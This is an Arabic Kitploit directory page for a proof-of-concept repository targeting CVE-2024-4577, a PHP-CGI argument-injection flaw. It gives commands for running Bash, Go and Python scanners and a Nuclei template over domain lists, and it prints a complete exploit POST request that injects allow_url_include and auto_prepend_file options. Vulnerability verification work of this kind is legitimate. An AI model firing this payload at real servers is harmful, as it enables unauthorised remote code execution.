Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577-PHP-RCE — إثبات مفهوم (PoC) لثغرة RCE في PHP (CVE-2024-4577) مكتوب بلغة bash و go و python وقالب nuclei. | Kitploit
أدوات/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

إثبات مفهوم (PoC) لثغرة RCE في PHP (CVE-2024-4577) مكتوب بلغة bash و go و python وقالب nuclei.

عرض المستودع
33132منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لـ PHP RCE

CVE-2024-4577: حقن الوسائط في PHP-CGI

نظرة عامة

يحتوي هذا المستودع على نصوص برمجية للتحقق من ثغرة CVE-2024-4577، وهي مشكلة حقن الوسائط في PHP-CGI. يمكنك استخدام نصوص Bash وGo وPython المقدمة لاختبار قائمة من النطاقات لهذه الثغرة. لقد أصدرت أيضًا ملف YAML لـ Nuclei.

الاستخدام

نص Bash

لاستخدام نص Bash، قم بتشغيل الأمر التالي:

root@kitploit:~
./CVE-2024-4577.sh /path/to/domains-list

نص Go

أولاً، احفظ نص Go في ملف باسم CVE-2024-4577.go. لبناء وتشغيل نص Go:

  1. قم بتجميع نص Go إلى ملف ثنائي:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • قم بتشغيل الملف الثنائي مع ملف قائمة النطاقات كوسيطة:

    root@kitploit:~
    ./CVE-2024-4577 /path/to/domains-list
    
  • نص Python

    أولاً، احفظ نص Python في ملف باسم CVE-2024-4577.py. لتشغيل نص Python:

    1. تأكد من تثبيت مكتبة requests:

      root@kitploit:~
      pip install requests
      
    2. قم بتشغيل نص Python مع ملف قائمة النطاقات كوسيطة:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list
      
    3. (اختياري) إذا كنت تريد طباعة المضيفين الثغرات فقط:

      root@kitploit:~
      python CVE-2024-4577.py /path/to/domains-list --quiet
      

    شرح إثبات المفهوم (POC)

    لاختبار الثغرة يدويًا، يمكنك إرسال طلب POST التالي:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    قالب Nuclei

    لقد قمت أيضًا بإنشاء قالب Nuclei لفحص المثيلات الثغرات، ويستخدم مخطط التخطيط v3 وقد تم اختباره في بيئة مختبرية:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <target-url>
    

    مثال على قائمة النطاقات

    يجب أن تكون قائمة النطاقات مسبوقة بـ http/https لضمان قراءتها بشكل صحيح.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    مثال على الإخراج

    إذا تم العثور على نطاق معرض للثغرة، سيكون الإخراج:

    root@kitploit:~
    http://example.com: Vulnerable
    http://vulnerablesite.com: Vulnerable
    
    تنزيل الأداة